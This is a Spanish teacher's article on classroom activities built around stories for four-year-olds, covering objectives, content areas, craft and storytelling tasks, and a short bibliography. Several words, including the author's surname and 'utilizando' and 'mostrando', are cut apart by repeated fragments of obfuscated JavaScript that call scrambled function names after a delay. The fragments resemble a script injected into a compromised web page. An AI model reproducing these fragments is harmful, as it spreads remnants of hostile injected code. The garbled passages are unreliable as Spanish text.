ACTIVIDADES A TRAVÉS DE UN CUENTO

Autora: María Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez

          En este artículo voy a exponer qué actividades realizo con mis alumnos/as a través de un cuento. Con estas actividades yo pretendo fomentar el interés por la lectura y la escritura utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el cuento como elemento motivador, así como la creación de buenos hábitos en el uso y cuidado de los libros. Además, vamos a estimular la adquisición de nuevas habilidades y destrezas para despertar la sensibilidad estética y la creativa.   


 

Desarrollo de la actividad

         Estas actividades van dirigidas a los alumnos/as del segundo nivel del segundo ciclo de Educación Infantil, es decir, 4 años.


        Vamos a trabajar el área de Los lenguajes: Comunicación y representación.

        Se encuentra relacionada con los siguientes Objetivos generales de área:

-         Comprender, reproducir y recrear algunos textos literarios mostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actitudes de valoración, disfrute e interés hacia ellos así como a textos y producciones propias de nuestra Comunidad Autónoma.

-         Acercarse al conocimiento de obras artísticas expresadas en distintos lenguajes y realizar actividades de representación y expresión artística mediante el empleo de diversas técnicas.


Bloque de contenido:

         Lenguaje verbal. Y dentro de este bloque la Aproximación a la lengua escrita y el Acercamiento a la literatura. Los contenidos que vamos a trabajar son los siguientes:


-         Atención y comprensión de narraciones, cuentos y otros mensajes leídos por un adulto o un compañero mayor.

-         La lengua escrita como medio de comunicación, información y disfrute.

-         Textos orales de tradición cultural.

Comienzan las actividades:

-          Realizar en el rincón de plástica con cartulina los personajes de los cuentos con sus etiquetas, es decir, con sus nombres. Una vez realizado, lo guardaran en una cajita que estará colocada en el rincón de la biblioteca. Así los alumnos/as, cada vez que quieran, podrán ir a la cajita y escenificar los cuentos trabajados, inventarse finales distintos…a través de los personajes realizados.

-          Una vez a la semana, un alumno/a de primaria irá al aula infantil a contarnos un cuento. Terminada la lectura, les entregará una ficha donde tendrá que dibujar aquello que más le haya llamado la atención. Además, tendrán que escribir su nombre y lo que han dibujado.

-          El protagonista de la semana nos contará el cuento que durante el fin de semana le han contado sus papás. Además, traerá de casa un dibujo realizado sobre el cuento.

-          Cada semana vendrá una mamá a contarnos un cuento. Seguidamente yo lo pasaré al libro gigante de los cuentos y mis alumnos/as realizaran dibujos sobre el mismo.


-         Inventamos cuentos. Yo les diré a mis alumnos/as dos palabras y a partir de estas tendrán que inventarse un cuento.

-         Dibujar el cuento contado en escena: cada niño/a puede elegir una escena.

-         Realizar un móvil con los personajes de un cuento.

-         Contar historias de la vida real a través de los personajes de un cuento.

-         Diccionario de cuentos. En este diccionario los alumnos/as escribirán todas las palabras desconocidas que aparecen en los cuentos. Cada palabra irá acompañada de un dibujo.

-         Realizar caretas para posteriormente poder escenificar los cuentos.

-         Diseñar portadas distintas para un mismo cuento. Seguidamente  serán colocadas en el mural de las portadas.

 

Bibliografía:

  • -         Zabalza, M.A. Didáctica de la Educación Infantil. Ed. Narcea S.A. Madrid, 1987
  • -         Piaget, J. y Inchelder, B.: La psicología del niño. Editorial Morata. Madrid, 1984.
  • -         Lowenfeld, Víctor y Brittain, W. Desarrollo de la capacidad creadora.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.